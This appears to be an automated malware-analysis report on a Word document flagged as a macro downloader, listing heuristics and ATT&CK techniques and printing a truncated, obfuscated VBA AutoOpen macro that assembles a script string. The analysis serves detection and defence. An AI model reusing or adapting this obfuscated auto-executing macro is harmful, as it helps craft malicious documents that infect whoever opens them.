Verdict: MALICIOUS
Risk Score: 250

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
This Office document triggers the critical OLE_VBA_SHELL heuristic, indicating a Shell() call within its VBA macros. An AutoOpen macro is present and likely executes the malicious code when the document is opened. The ClamAV detection 'Doc.Downloader.Valyria-6704836-0' further confirms its malicious nature as a downloader. The VBA script is heavily obfuscated, but its structure suggests it is designed to download and execute a second-stage payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Valyria-6704836-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6704836-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OLE body):
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/photoshop/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/tiff/1.0/
  - http://ns.adobe.com/exif/1.0/
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 348340 bytes |

SHA-256 (macros.bas): 736f575256590b704186152ed2f73c6237cb1f61aa0f4044d3edfa4c2919af7a
Preview script (first 1,000 lines of the extracted script; output truncated by the analyzer):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function kker()
MsgBox "warning"
End Function
Sub AutoOpen()
Const iyiy = "a_yya"
Const qmshlvpbj = "ecbwpay"
Const iboopzwt = "ioghe"
Const uxij94 = "hwazbdca"
If 1050 < 2731 Then
a_ylbgtw = "$yutclegzqoyby='m'') -re';$a_bqijbrubozugchzri"
End If
Const bore3 = "iuccao"
Select Case "iievxj"
Case 30892
Const jjeoqv = "xllmluy"
Case "iievxj"
mqifxscbknb = a_ylbgtw + oxnikpkk_st_sr
Const ceuxpaq = "i_xmoxz_i"
uppmyxkkf = "40='; $pce'"
mqifxscbknb = mqifxscbknb + uppmyxkkf + ixhmvried
End Select
Const ydlajwi4 = "yao_uy20"
Select Case "cxayocfkq92"
Case "cxayocfkq92"
ygqwheenhji = ";$pshrldvbprr_j_wdzgduwd='-"
Const ikgvvi = "l_eukss"
Const mrfhuck_ssk = "ztjmphg"
Const rfoia = "iiock"
Const ufceexe = "edey_aj29"
mqifxscbknb = mqifxscbknb + ygqwheenhji + ghopxyp
Case 29369
Const iuyeqm = "gtaogxu"
Const ecefsy = "ykzwdzu4"
Case 23715
Const qnzhok = "afmzm"
Const bvnpuee = "eqvtrlau"
End Select
Const uizkl = "ouerqp"
Select Case 77 - 52
Case urcarg
Const pt_yfty58 = "opmu_lv"
Const pyaejgv = "mqkjio"
Case eejynkbxtv
Const yuea = "chummeewp"
Const awikl = "veypzc"
Case 25
groy_n = mqifxscbknb
fyspu3 = "Dat';$"
Const jomae = "oyjqbj9"
groy_n = groy_n + fyspu3
End Select
Const uyett30 = "vhayivzw"
Select Case "ogxuai_ir"
Case "ogxuai_ir"
axtk_ehnc2 = "uxxevdyblzdljevq"
Const r_v_qrobi = "chwtiq"
Const nhepkchh = "ofyyju"
Const bwbvgo = "mnhei"
Const qryplgm_ac = "tjpivhy"
Const qbzui = "soyuo"
groy_n = groy_n + axtk_ehnc2
End Select
Const efkvmielq = "oseoi"
Const oyknfo = "aftcyom"
Const auprtpf = "oyyjxpm"
If 4252 <= 5548 Then
lzhhdke = bxrhkr + groy_n
Const aue_s = "auia78"
Const a_vyhux = "eyyo"
lzhhdke = lzhhdke + "fxsrvoh"
ElseIf 96 + 9 = 87 Then
Const aexvvwi05 = "fpyp"
Const ifsohr = "preehq"
Const yeoe07 = "ihwio"
Const uicmwvrfxc = "aygeq"
Const ejapww = "ibodro04"
Const ioy_i_hgi = "jgeeou"
Const uooe = "ooejy3"
Const e_kaldw = "dcdxpsz"
Const ecgiofx = "c_yeoe"
Const icehhi = "rointfzo"
Const heqxrek = "ff_zesf"
Const uskqelb = "olfmro"
Const fweoaie7 = "oeaa"
Const oy_y_x = "tiiq09"
Else
Const dbjoc = "xkuiouo"
Const wtyogvp = "dfnlntoqf"
Const ekttv0 = "aqelra"
Const ynzaybu = "uuouj"
End If
Const wqgjw_fai = "oicrvhk"
Select Case 43 - 44
Case -1
i_ziirce40 = lzhhdke + ooooi
Const aqfvqu = "oyomy"
qnkzrx = "wiyomlc='"
Const rxkih = "ucxewjas"
i_ziirce40 = i_ziirce40 + qnkzrx
End Select
Select Case "vrptyggevd"
Case qqisyb
Const zswxzcoq = "att_oy"
Case eitiuyurv
Const mfgkakvf = "arp_aaird0"
Const mxpmwye = "hbfwlw"
Case "vrptyggevd"
obkhbmri_i_oa = cqufbiwy1 + i_ziirce40 + ixrggcsbnsbk
Const yjmkmlcke = "pmoyshyqn"
niaufs = "th;R';$ykwjcebwfva"
obkhbmri_i_oa = eygc_qseo + obkhbmri_i_oa + niaufs + iyeiusx
End Select
Const hfgyq_a = "vazey"
If 3719 > 1153 Then
obkhbmri_i_oa = obkhbmri_i_oa + "_nwjiqjrzuouzbzey_ogahbss_e_"
End If
Const gelzke67 = "tnafcsp"
Const angai1 = "yue_aa"
Const eeszio = "yya_dy"
Const apunv = "jmoaadwp"
Select Case "uytiwgjuwj"
Case 7721
Const uiqcio = "nsmpgxzfxcf"
Const uabdo = "jqpmjircb"
Case "uytiwgjuwj"
obkhbmri_i_oa = obkhbmri_i_oa + "azf='ormat %s';$tboyaeudjq_" + ersvzuaa6
Case 2144
Const hmnl_ekto = "qoacv"
End Select
Const oizfafe8 = "atznsylw"
Select Case 48 - 72
Case -24
nae_rlimku = hotvir + obkhbmri_i_oa + iddoyiie
Const kv_qzjcw = "wuvvzyu"
nae_rlimku = nae_rlimku + "ik"
End Select
Select Case "qonaftukx"
Case 8665
Const yohzya = "iufrly"
Const mhaxntuy = "wrlgwn"
Const kiegqrhq01 = "yiube"
Const phyatrv = "lappay"
Const vzpfqjnl = "leqo_i"
Case "qonaftukx"
wgxnzrhgyyld = "qxdieey_hshbc_uujzg"
Const ukuq = "gsmxji_a"
Const oe_mxe = "alhcfmw_o"
nae_rlimku = nae_rlimku + wgxnzrhgyyld + fcysyusmo
End S ... (truncated)
```